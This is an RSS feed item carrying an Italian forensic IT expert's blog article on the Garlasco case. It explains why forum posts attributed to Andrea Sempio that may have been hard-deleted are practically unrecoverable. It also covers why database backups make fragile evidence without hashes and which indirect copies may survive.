<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Luca Mercatanti</title>
	<atom:link href="https://luca-mercatanti.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://luca-mercatanti.com/</link>
	<description>Perizie Informatiche Forensi, Perito Informatico</description>
	<lastBuildDate>Thu, 07 May 2026 11:19:31 +0000</lastBuildDate>
	<language>it-IT</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://luca-mercatanti.com/wp-content/uploads/2026/05/cropped-favicon-512-32x32.png</url>
	<title>Luca Mercatanti</title>
	<link>https://luca-mercatanti.com/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Caso Garlasco: perché i messaggi di Sempio cancellati dal forum non si possono recuperare</title>
		<link>https://luca-mercatanti.com/caso-garlasco-perche-i-messaggi-di-sempio-cancellati-dal-forum-non-si-possono-recuperare/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=caso-garlasco-perche-i-messaggi-di-sempio-cancellati-dal-forum-non-si-possono-recuperare</link>
					<comments>https://luca-mercatanti.com/caso-garlasco-perche-i-messaggi-di-sempio-cancellati-dal-forum-non-si-possono-recuperare/#respond</comments>
		
		<dc:creator><![CDATA[Luca Mercatanti]]></dc:creator>
		<pubDate>Thu, 07 May 2026 11:18:41 +0000</pubDate>
				<category><![CDATA[Informatica Forense]]></category>
		<guid isPermaLink="false">https://luca-mercatanti.com/?p=35834</guid>

					<description><![CDATA[<p>Da qualche giorno, in mezzo al rumore mediatico sulla nuova fase dell&#8217;inchiesta sul delitto di Garlasco, c&#8217;è una&#8230;</p>
<p>L'articolo <a href="https://luca-mercatanti.com/caso-garlasco-perche-i-messaggi-di-sempio-cancellati-dal-forum-non-si-possono-recuperare/">Caso Garlasco: perché i messaggi di Sempio cancellati dal forum non si possono recuperare</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Da qualche giorno, in mezzo al rumore mediatico sulla nuova fase dell&#8217;inchiesta sul delitto di Garlasco, c&#8217;è una frase che rimbalza ovunque: sui social, nei commenti agli articoli, perfino in qualche talk-show. È la frase del <em>cugino esperto di tecnologia</em>: «<em>Tanto l&#8217;autorità giudiziaria può sempre recuperare i messaggi cancellati</em>».</p>



<p><strong>Spoiler: no, non può. Almeno non come la gente immagina.</strong></p>



<p>E siccome il tema è diventato di interesse pubblico — con migliaia di post attribuiti ad Andrea Sempio sul forum <em>Italian Seduction Club</em> sotto il nickname &#8220;Andreas&#8221;, scritti tra il 2009 e il 2016 e ora finiti al centro dell&#8217;indagine — vale la pena fare un po&#8217; di chiarezza tecnica. In modo semplice, ma onesto.</p>



<figure data-wp-context="{&quot;imageId&quot;:&quot;6a1947b5bbeed&quot;}" data-wp-interactive="core/image" data-wp-key="6a1947b5bbeed" class="wp-block-image size-large wp-lightbox-container"><img fetchpriority="high" decoding="async" width="1024" height="576" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on--click="actions.showLightbox" data-wp-on--load="callbacks.setButtonStyles" data-wp-on-window--resize="callbacks.setButtonStyles" src="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-07-_-I-commenti-del-cugino-esperto-1024x576.png" alt="" class="wp-image-35849" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-07-_-I-commenti-del-cugino-esperto-1024x576.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-07-_-I-commenti-del-cugino-esperto-300x169.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-07-_-I-commenti-del-cugino-esperto-768x432.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-07-_-I-commenti-del-cugino-esperto-1536x864.png 1536w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-07-_-I-commenti-del-cugino-esperto-2048x1152.png 2048w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-07-_-I-commenti-del-cugino-esperto-380x214.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-07-_-I-commenti-del-cugino-esperto-800x450.png 800w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-07-_-I-commenti-del-cugino-esperto-1160x653.png 1160w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-07-_-I-commenti-del-cugino-esperto-scaled.png 2560w" sizes="(max-width: 1024px) 100vw, 1024px" /><button
			class="lightbox-trigger"
			type="button"
			aria-haspopup="dialog"
			aria-label="Ingrandisci"
			data-wp-init="callbacks.initTriggerButton"
			data-wp-on--click="actions.showLightbox"
			data-wp-style--right="state.imageButtonRight"
			data-wp-style--top="state.imageButtonTop"
		>
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewBox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z" />
			</svg>
		</button></figure>



<h2 id="il-punto-di-partenza-cosa-e-successo-davvero" class="wp-block-heading">Il punto di partenza: cosa è successo davvero</h2>



<p>Riassumo i fatti, perché servono per inquadrare il discorso. Sul forum citato sopra, l&#8217;utente &#8220;Andreas&#8221; — riconducibile, secondo la stessa difesa, ad Andrea Sempio — ha pubblicato migliaia di messaggi. La cifra che circola è quella ricostruita dalla redazione di <a href="https://mowmag.com/attualita/delitto-di-garlasco-andrea-s-e-i-post-inquietanti-sul-forum-dei-seduttori-dalla-one-itis-tra-i-18-e-i-20-anni-al-dubbio-su-personalita-repressa-da-serial-killer-israeliano">MowMag</a> e ripresa da diverse testate: <strong>il contatore del forum riporta 3.428 post</strong> a nome di Andrea S, di cui 3.362 effettivamente visitabili. <strong>Mancano all&#8217;appello una sessantina di messaggi.</strong></p>



<figure data-wp-context="{&quot;imageId&quot;:&quot;6a1947b5bc217&quot;}" data-wp-interactive="core/image" data-wp-key="6a1947b5bc217" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" width="1024" height="576" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on--click="actions.showLightbox" data-wp-on--load="callbacks.setButtonStyles" data-wp-on-window--resize="callbacks.setButtonStyles" src="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-08-_-Il-profilo-di-_Andreas_-1-1024x576.png" alt="" class="wp-image-35852" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-08-_-Il-profilo-di-_Andreas_-1-1024x576.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-08-_-Il-profilo-di-_Andreas_-1-300x169.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-08-_-Il-profilo-di-_Andreas_-1-768x432.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-08-_-Il-profilo-di-_Andreas_-1-1536x864.png 1536w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-08-_-Il-profilo-di-_Andreas_-1-2048x1152.png 2048w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-08-_-Il-profilo-di-_Andreas_-1-380x214.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-08-_-Il-profilo-di-_Andreas_-1-800x450.png 800w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-08-_-Il-profilo-di-_Andreas_-1-1160x653.png 1160w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-08-_-Il-profilo-di-_Andreas_-1-scaled.png 2560w" sizes="(max-width: 1024px) 100vw, 1024px" /><button
			class="lightbox-trigger"
			type="button"
			aria-haspopup="dialog"
			aria-label="Ingrandisci"
			data-wp-init="callbacks.initTriggerButton"
			data-wp-on--click="actions.showLightbox"
			data-wp-style--right="state.imageButtonRight"
			data-wp-style--top="state.imageButtonTop"
		>
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewBox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z" />
			</svg>
		</button></figure>



<p><strong>Possono essere in sezioni riservate. Oppure possono essere stati cancellati. </strong>Curiosità: la possibilità di cancellare i propri post fu introdotta dall&#8217;amministratore del forum nell&#8217;estate 2016, al costo di 10 euro a post. Per Sempio, ripulire tutto sarebbe costato oltre 34.000 euro.</p>



<p>Quindi: <strong>se</strong> una sessantina di post fosse stata davvero rimossa, il tema — qui ed è ciò di cui voglio parlare — <strong>è capire se quei messaggi sarebbero in qualche modo recuperabili da parte degli inquirenti</strong>. La risposta breve è: praticamente no. Quella lunga richiede di spiegare un paio di cose.</p>



<h2 id="come-funziona-tecnicamente-un-forum" class="wp-block-heading">Come funziona, tecnicamente, un forum</h2>



<p>Un forum non è &#8220;una pagina web&#8221;. È un software che gira su un server e che, sotto il cofano, scrive ogni messaggio in un <strong>database</strong>. Pensate al database come a un foglio Excel gigantesco: ogni post è una riga, con dei campi (autore, data, testo, sezione, etc.).<br>Quando voi caricate la pagina del forum, il software pesca quelle righe dal database (dal nostro foglio Excel, per continuare con l&#8217;esempio di prima), le impagina con grafica e ve le mostra.</p>



<figure data-wp-context="{&quot;imageId&quot;:&quot;6a1947b5bc480&quot;}" data-wp-interactive="core/image" data-wp-key="6a1947b5bc480" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" width="1024" height="576" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on--click="actions.showLightbox" data-wp-on--load="callbacks.setButtonStyles" data-wp-on-window--resize="callbacks.setButtonStyles" src="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-01-_-Il-database-del-forum-1024x576.png" alt="" class="wp-image-35843" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-01-_-Il-database-del-forum-1024x576.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-01-_-Il-database-del-forum-300x169.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-01-_-Il-database-del-forum-768x432.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-01-_-Il-database-del-forum-1536x864.png 1536w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-01-_-Il-database-del-forum-2048x1152.png 2048w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-01-_-Il-database-del-forum-380x214.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-01-_-Il-database-del-forum-800x450.png 800w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-01-_-Il-database-del-forum-1160x653.png 1160w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-01-_-Il-database-del-forum-scaled.png 2560w" sizes="(max-width: 1024px) 100vw, 1024px" /><button
			class="lightbox-trigger"
			type="button"
			aria-haspopup="dialog"
			aria-label="Ingrandisci"
			data-wp-init="callbacks.initTriggerButton"
			data-wp-on--click="actions.showLightbox"
			data-wp-style--right="state.imageButtonRight"
			data-wp-style--top="state.imageButtonTop"
		>
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewBox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z" />
			</svg>
		</button></figure>



<p>Questa è la prima cosa da tenere a mente: <strong>esiste una riga in un database</strong>, su un disco di un server, da qualche parte nel mondo. <strong>Esiste la riga nel nostro foglio Excel: se la cancelliamo, non è detto che sia recuperabile senza un backup.</strong></p>



<h2 id="cosa-succede-davvero-quando-si-cancella-un-messaggio" class="wp-block-heading">Cosa succede davvero quando si &#8220;cancella&#8221; un messaggio</h2>



<p>Qui c&#8217;è la prima distinzione importante, perché esistono due tipi di cancellazione:</p>



<ul class="wp-block-list">
<li><strong>Cancellazione logica (soft delete).</strong> Il messaggio non viene rimosso davvero: il software cambia un campo nel database e da quel momento in poi, quando si carica la pagina, <strong>il messaggio non viene mostrato. Però è ancora lì.</strong><br>In questo caso sì, su richiesta dell&#8217;autorità giudiziaria, il gestore del forum può facilmente &#8220;ripescarlo&#8221; dal database.<br>Per continuare nel nostro parallelismo con Excel: è come se barrassimo una riga. Questa è ancora lì, visibile, ma semplicemente la ignoriamo.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Cancellazione fisica (hard delete).</strong> La riga viene proprio eliminata dalla tabella. A quel punto il database, per il software del forum, non sa più che quel messaggio sia mai esistito. E questo è lo scenario su cui si gioca tutta la discussione.</li>
</ul>



<p><strong>La maggior parte dei forum moderni implementa una cancellazione di tipo <em>hard</em>,</strong> soprattutto quando il servizio è a pagamento e il senso commerciale stesso dell&#8217;operazione è &#8220;sparire davvero&#8221;. Se pago 10 euro per cancellare un post e quello rimane nel database con un flag, il prodotto venduto sarebbe una truffa.</p>



<h2 id="il-mito-del-recupero-forense-perche-in-pratica-non-funziona" class="wp-block-heading">Il mito del &#8220;recupero forense&#8221;: perché in pratica non funziona</h2>



<p>A questo punto il ragionamento del cugino-esperto è: «<em><strong>Sì, ma anche se la riga è cancellata dal database, sul disco rigido c&#8217;è una traccia. La polizia postale recupera tutto</strong></em>».<br>Questa è un&#8217;idea che viene dal <em>folklore</em> delle serie TV americane più che dalla realtà ed anzi, prende spesso il nome di &#8220;Effetto CSI&#8221; (di cui spesso parlo durante i miei speech). <br>Quando un dato viene cancellato fisicamente da un database, lo spazio sul disco non viene immediatamente azzerato: viene <strong>marcato come libero</strong>. Quel pezzo di disco, in teoria, potrebbe ancora contenere il vecchio dato fino a quando non viene riscritto.</p>



<figure data-wp-context="{&quot;imageId&quot;:&quot;6a1947b5bc748&quot;}" data-wp-interactive="core/image" data-wp-key="6a1947b5bc748" class="wp-block-image size-large wp-lightbox-container"><img loading="lazy" decoding="async" width="1024" height="576" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on--click="actions.showLightbox" data-wp-on--load="callbacks.setButtonStyles" data-wp-on-window--resize="callbacks.setButtonStyles" src="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-03-_-Sovrascrittura-sul-disco-1024x576.png" alt="" class="wp-image-35848" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-03-_-Sovrascrittura-sul-disco-1024x576.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-03-_-Sovrascrittura-sul-disco-300x169.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-03-_-Sovrascrittura-sul-disco-768x432.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-03-_-Sovrascrittura-sul-disco-1536x864.png 1536w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-03-_-Sovrascrittura-sul-disco-2048x1152.png 2048w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-03-_-Sovrascrittura-sul-disco-380x214.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-03-_-Sovrascrittura-sul-disco-800x450.png 800w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-03-_-Sovrascrittura-sul-disco-1160x653.png 1160w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-03-_-Sovrascrittura-sul-disco-scaled.png 2560w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><button
			class="lightbox-trigger"
			type="button"
			aria-haspopup="dialog"
			aria-label="Ingrandisci"
			data-wp-init="callbacks.initTriggerButton"
			data-wp-on--click="actions.showLightbox"
			data-wp-style--right="state.imageButtonRight"
			data-wp-style--top="state.imageButtonTop"
		>
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewBox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z" />
			</svg>
		</button></figure>



<p>In teoria. Perché su un server di un forum attivo, con migliaia di utenti che pubblicano in continuazione, lo spazio &#8220;libero&#8221; viene riutilizzato in tempi brevissimi — minuti, ore al massimo. Il vecchio messaggio viene <strong>sovrascritto</strong> da nuovi dati e a quel punto è perso davvero, anche per i forensi più attrezzati. È la stessa logica per cui, se cancellate un file dal vostro PC e continuate a usarlo, dopo qualche giorno non c&#8217;è più software al mondo che ve lo ripeschi.</p>



<p>Aggiungiamo che:</p>



<ul class="wp-block-list">
<li>I database moderni gestiscono lo spazio in pagine compattate, frammentate, indicizzate. Non si &#8220;leggono i bit&#8221; come si farebbe su un settore grezzo del disco.</li>



<li>I server di forum di solito girano in datacenter su storage condiviso, con replicazione, snapshot rotanti, virtualizzazione. La nozione stessa di &#8220;disco fisico da analizzare&#8221; diventa fumosa.</li>



<li>Anche se per assurdo si arrivasse a un blocco di dati ancora intatto, ricostruire il contesto (di chi era? quando? in quale thread?) senza i metadati del database è un lavoro spesso impossibile.</li>
</ul>



<p>In pratica: <strong>una volta che un messaggio è stato cancellato fisicamente da un forum attivo, è perso. Punto.</strong> Non c&#8217;è perizia che tenga. L&#8217;unica cosa che la magistratura può ottenere è ciò che esiste ancora.</p>



<h2 id="lunica-vera-eccezione-i-backup" class="wp-block-heading">L&#8217;unica vera eccezione: i backup</h2>



<p>C&#8217;è un caso in cui il messaggio cancellato può &#8220;tornare in vita&#8221;: se esiste un <strong>backup</strong> del database fatto <strong>prima</strong> della cancellazione.<br>I backup sono copie periodiche del database che il gestore conserva per sicurezza, in caso di guasti o attacchi informatici. A seconda della politica del forum, possono essere giornalieri, settimanali, mensili. Possono essere conservati per giorni o per anni.</p>



<p>Se un giudice chiede al gestore del forum di consegnare i backup e fra questi ce n&#8217;è uno antecedente alla cancellazione, allora sì: il messaggio è lì, basta aprirlo per leggerlo.</p>



<p><em><strong>Sembra la soluzione magica, ma c&#8217;è un problema serio.</strong></em></p>



<p>Ed è qui che la questione diventa giuridicamente delicatissima.<br>Un file di backup di un database è, alla fine, un file. Tipicamente un dump SQL, cioè un lungo elenco di istruzioni di testo. <strong><em>Si apre con un editor di testo qualsiasi. E si modifica con la stessa facilità.</em></strong></p>



<figure data-wp-context="{&quot;imageId&quot;:&quot;6a1947b5bc9f5&quot;}" data-wp-interactive="core/image" data-wp-key="6a1947b5bc9f5" class="wp-block-image size-large wp-lightbox-container"><img loading="lazy" decoding="async" width="1024" height="576" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on--click="actions.showLightbox" data-wp-on--load="callbacks.setButtonStyles" data-wp-on-window--resize="callbacks.setButtonStyles" src="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-04-_-Il-backup-come-prova-fragile-1024x576.png" alt="" class="wp-image-35844" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-04-_-Il-backup-come-prova-fragile-1024x576.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-04-_-Il-backup-come-prova-fragile-300x169.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-04-_-Il-backup-come-prova-fragile-768x432.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-04-_-Il-backup-come-prova-fragile-1536x864.png 1536w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-04-_-Il-backup-come-prova-fragile-2048x1152.png 2048w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-04-_-Il-backup-come-prova-fragile-380x214.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-04-_-Il-backup-come-prova-fragile-800x450.png 800w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-04-_-Il-backup-come-prova-fragile-1160x653.png 1160w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-04-_-Il-backup-come-prova-fragile-scaled.png 2560w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><button
			class="lightbox-trigger"
			type="button"
			aria-haspopup="dialog"
			aria-label="Ingrandisci"
			data-wp-init="callbacks.initTriggerButton"
			data-wp-on--click="actions.showLightbox"
			data-wp-style--right="state.imageButtonRight"
			data-wp-style--top="state.imageButtonTop"
		>
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewBox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z" />
			</svg>
		</button></figure>



<p>Niente impedisce, tecnicamente, al gestore del forum (o a chiunque abbia accesso al server) di:</p>



<ul class="wp-block-list">
<li><strong>Aggiungere</strong> post mai scritti, attribuendoli a un utente qualsiasi.</li>



<li><strong>Eliminare</strong> post realmente esistiti.</li>



<li><strong>Modificare</strong> il testo di post per renderli più (o meno) compromettenti.</li>



<li><strong>Cambiare</strong> date, ID utente, sezioni di pubblicazione.</li>
</ul>



<p>E la modifica, fatta bene, è praticamente <strong>invisibile</strong>: quando si riapre il file modificato, non c&#8217;è alcuna &#8220;spia&#8221; che dice &#8220;questo backup è stato manomesso&#8221;. A meno che — ed è il punto cruciale — al momento della creazione del backup non sia stata generata una <strong>firma digitale</strong> o un <strong>hash crittografico</strong> del file, conservato in modo sicuro e indipendente (per esempio, depositato presso un terzo, certificato con marca temporale, etc&#8230;).<br>Cose che, vi assicuro, <strong>nessun forum amatoriale di seduzione fa</strong>. E che di solito non fanno nemmeno le piattaforme commerciali medie.<br>È una pratica che si trova in ambienti enterprise regolamentati: sanità, banche, telco. Non in un forum gestito da una S.r.l. italiana.</p>



<p>Risultato: anche se domani saltasse fuori un backup del 2015 con i 66 post mancanti di &#8220;Andreas&#8221;, in sede dibattimentale la difesa avrebbe gioco facile a sollevare il dubbio sull&#8217;integrità di quel file. Non perché sia stato modificato: ma perché <strong>non è dimostrabile che non sia stato modificato</strong>, ed è la procura a doverlo dimostrare. La validità probatoria di un dato del genere è tutta da costruire — con perizie, testimonianze del gestore, ricostruzione della catena di custodia — e resta comunque fragile.</p>



<h2 id="le-altre-fonti-residue-quelle-che-spesso-si-dimenticano" class="wp-block-heading">Le altre fonti residue (quelle che spesso si dimenticano)</h2>



<p>Detto tutto questo, c&#8217;è una verità un po&#8217; meno nota: anche se un messaggio è stato hard-cancellato, possono sopravvivere <strong>copie indirette</strong> in posti che non dipendono dal database del forum. Ed è qui che, paradossalmente, gli inquirenti hanno le possibilità migliori.</p>



<figure data-wp-context="{&quot;imageId&quot;:&quot;6a1947b5bcc61&quot;}" data-wp-interactive="core/image" data-wp-key="6a1947b5bcc61" class="wp-block-image size-large wp-lightbox-container"><img loading="lazy" decoding="async" width="1024" height="576" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on--click="actions.showLightbox" data-wp-on--load="callbacks.setButtonStyles" data-wp-on-window--resize="callbacks.setButtonStyles" src="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-05-_-Le-fonti-residue-_citazioni_-Wayback_-1024x576.png" alt="" class="wp-image-35845" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-05-_-Le-fonti-residue-_citazioni_-Wayback_-1024x576.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-05-_-Le-fonti-residue-_citazioni_-Wayback_-300x169.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-05-_-Le-fonti-residue-_citazioni_-Wayback_-768x432.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-05-_-Le-fonti-residue-_citazioni_-Wayback_-1536x864.png 1536w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-05-_-Le-fonti-residue-_citazioni_-Wayback_-2048x1152.png 2048w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-05-_-Le-fonti-residue-_citazioni_-Wayback_-380x214.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-05-_-Le-fonti-residue-_citazioni_-Wayback_-800x450.png 800w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-05-_-Le-fonti-residue-_citazioni_-Wayback_-1160x653.png 1160w, https://luca-mercatanti.com/wp-content/uploads/2026/05/Fig.-05-_-Le-fonti-residue-_citazioni_-Wayback_-scaled.png 2560w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><button
			class="lightbox-trigger"
			type="button"
			aria-haspopup="dialog"
			aria-label="Ingrandisci"
			data-wp-init="callbacks.initTriggerButton"
			data-wp-on--click="actions.showLightbox"
			data-wp-style--right="state.imageButtonRight"
			data-wp-style--top="state.imageButtonTop"
		>
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewBox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z" />
			</svg>
		</button></figure>



<ul class="wp-block-list">
<li><strong>Citazioni in messaggi di altri utenti.</strong> È il caso più tipico. Sui forum, quando si risponde a un post, spesso lo si &#8220;quota&#8221;: il testo originale viene incollato dentro la risposta. Se l&#8217;utente A scrive una frase compromettente e l&#8217;utente B gli risponde citandola, anche se A cancella il proprio post, <strong>la frase resta dentro il messaggio di B</strong>. È esattamente uno dei motivi per cui chi cerca di ripulire la propria storia online quasi sempre fallisce: i contenuti rimbalzano.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Web Archive (archive.org) e altri crawler.</strong> Le pagine pubbliche dei forum vengono spesso indicizzate dai crawler. Se la pagina con il messaggio incriminato era visibile senza login ed è stata &#8220;fotografata&#8221; da Wayback Machine prima della cancellazione, lì rimane per sempre — e in quel caso parliamo di una fonte terza, indipendente, datata, di valore probatorio molto più solido di un backup interno. Il limite: i forum che richiedono iscrizione per essere consultati di solito non vengono indicizzati.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Screenshot e copie fatte da altri utenti.</strong> Banalissimi, ma esistono. E possono essere prodotti come prove — con tutti i caveat del caso, perché anche uno screenshot si fabbrica in cinque minuti con Photoshop.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Cache di motori di ricerca.</strong> Storicamente Google teneva una &#8220;copia cache&#8221; delle pagine che indicizzava. Oggi questa funzionalità è stata in gran parte smantellata, ma per pagine vecchie può ancora capitare di trovarne traccia in archivi specializzati.</li>
</ul>



<h2 id="un-caso-a-parte-il-modello-cancellazione-a-pagamento" class="wp-block-heading">Un caso a parte: il modello &#8220;cancellazione a pagamento&#8221;</h2>



<p>Tutto il discorso fatto finora vale per i forum standard, dove l&#8217;utente può cancellare i propri post liberamente o, in alcuni casi, non può proprio farlo. Il forum <em>Italian Seduction Club</em> però funzionava in modo abbastanza singolare, e merita un capitolo a parte perché tocca direttamente il caso Garlasco — e perché solleva questioni giuridiche molto più ampie.</p>



